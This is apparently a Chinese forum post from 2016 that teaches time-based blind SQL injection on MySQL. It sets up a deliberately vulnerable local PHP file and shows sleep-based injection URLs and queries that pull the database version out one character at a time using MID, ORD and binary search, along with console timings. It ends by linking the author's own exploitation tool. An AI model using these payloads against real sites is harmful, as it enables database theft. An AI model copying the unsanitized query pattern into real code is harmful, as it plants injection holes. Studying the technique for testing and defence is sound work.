|
|
本帖最后由 blackfish 于 2016-1-8 20:51 编辑
延时注入适用于页面不打印数据也不爆错的情况,因为这样就不能用联合查询得到数据,也不能通过mysql爆错得到数据
本地测试的php文件
[PHP] 纯文本查看 复制代码 <?php
$conn = mysql_connect("localhost","root","") or die("数据库连接失败");
mysql_set_charset('GBK',$conn);
mysql_select_db("dede2",$conn);
$user = $_GET['user'];
$sql = "select uname,pwd from dede_admin where uname = '{$user}'";
$result = mysql_query($sql,$conn);
$results = mysql_fetch_assoc($result);
mysql_close($conn);
?>
怎么判断是否存在延时注入
http://localhost/sleep.php?user=admin'+AND+sleep(5)+--+
数据库中执行的是
Select uname,pwd from admin where uname='admin' and sleep(5);
如果条件成立(uname ='admin'),那么延时5秒,否则不延时.
Select length((select @@version)) #查询版本长度
Select uname,pwd from admin where uname='admin' and sleep(if(length((select @@version))=10,0,5))
如果 uname='admin' 和length((select @@version))=10同时成立,那么不延时
如果 uname='admin'不成立, 那么无论length((select @@version))=10成不成立都不延时
只有uname='admin'成立,length((select @@version))=10不成立时才延时
知道可以延时的时候 怎么取数据
mysql> select mid((select @@version),1,2); #从第一位开始取,取2位
+-----------------------------+
| mid((select @@version),1,2) |
+-----------------------------+
| 5. |
+-----------------------------+
1 row in set (0.00 sec)
mysql> select mid((select @@version),1,10); #从第一位开始取,取10位
+------------------------------+
| mid((select @@version),1,10) |
+------------------------------+
| 5.5.20-log |
+------------------------------+
1 row in set (0.00 sec)
Select uname,pwd from dede_admin where uname='admin' and sleep(if(mid((select @@version),1,1)=10,0,5));
如果select @@version的 第一位结果是10,则不延时,否则延时5秒,这样就可以把select @@version的值一位一位取出来
当Select uname,pwd from dede_admin where uname='admin' and sleep(if(mid((select @@version),1,1)=5,0,5)); 没有延时,说明select @@version的第一位的值为5,那么问题来了, 小数点怎么取呢,mysql有个ORD函数,作用是把字符转换成ASCII编码
Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid((select @@version),2,1))=46,0,5));没有延时,说明select @@version的第二位的ASCII编码是46,也就是小数点
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),2,1))=54,0,5));
Empty set (5.02 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),2,1))=46,0,5));
Empty set (0.00 sec)
mysql> select @@version;
+------------+
| @@version |
+------------+
| 5.5.20-log |
+------------+
1 row in set (0.00 sec)
这样就可以取出字符和特殊符号,为了快速确定取出的值到底是多少,可以
使用大于号或小于号的二分法来代替等号
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<50,0,5));
Empty set (5.01 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<52,0,5));
Empty set (5.01 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<53,0,5));
Empty set (5.00 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<54,0,5));
Empty set (0.00 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))=54,0,5));
Empty set (5.01 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))=53,0,5));
Empty set (0.00 sec)
这样可以快速确定select @@version的第三位ASCII编码是53,也就是5
如果知道了延时注入原理,那么学几天python就能写出漏洞利用工具了,这个就是我写出来的小工具
http://www.f0rg3t.com/Show/index/cid/1/id/9.html |
评分
-
查看全部评分
|
发表于 2016-1-7 17:38:06
